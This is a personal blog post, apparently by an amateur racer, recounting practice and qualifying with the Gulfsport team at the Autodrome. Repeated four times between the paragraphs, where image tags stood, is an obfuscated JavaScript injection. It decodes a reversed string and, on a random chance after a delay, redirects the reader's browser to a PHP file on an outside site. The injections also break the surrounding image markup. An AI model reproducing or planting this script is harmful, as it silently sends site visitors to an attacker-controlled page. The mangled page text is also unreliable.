It had been a week of, do i? or don’t I? The car was, to all intents and purposes finished after 2 years of hard work, blood, sweat and tears-but having been here for 5 years yet never even driven more than 5 laps around the Autodrome-was I?? Several days of severe ‘arm twisting’ by Gary Francis, Andy Knight and my other half Stacey and the decision was made that ‘I do”

Stacey dropped me off at the Autodome at 7.30am Thursday morning and the car was was ready and waiting for me in the Gulfsport pit garage and the guys all there working hard prepping the Radicals.First stop…signing on, followed by scrutineering-all good so far.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd2/mike%20scott/mikescott2.jpg” width=”728″ />

However, being a normal work day and the day before a race meeting my phone was red hot and I ended up back at Gulfsport HQ selling various items to ‘lastminutemotorsport.com’ racers.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd2/touringcars13.jpg” width=”728″ />

Back to the Autodrome for free practice, the car felt quite a handful on old tires and the water temperature seemed to be going through the roof-clocking 111 degrees in the session-concerned faces all round then the decision that nothing could really be done about it so we’d push on. Sam Zian set to work stickering up the car and did a fantastic job.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd2/mike%20scott/mikescott51.jpg” width=”728″ />

Off down to Dunlop to see Chris Keogh and the guys to acqure a new set of rubber for qualifying. Feeling a little apprehensive about the task ahead of me I was grateful for the constant support, general p*ss taking and attention to detail from the Gulfsport family around me. Did find out later however that there was a little sweepstake going on about what was the best time I would clock over the weekend amongst the team!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd2/mike%20scott/mikescott7.jpg” width=”728″ />

Qualifying went without a hitch, the new rubber making a big difference to the handling (apart from the water temperature again being off the scale) and I did 5 steady laps then pitted so the tyre temp/pressures could be checked by Colin from Dunlop-he recommended a tyre pressure change and I was back out to complete the qualifying session, qualifying 18th overall and about mid grid in the B class. I apparently came in smiling which Stacey says I dont do very often so I must have enjoyed myself!
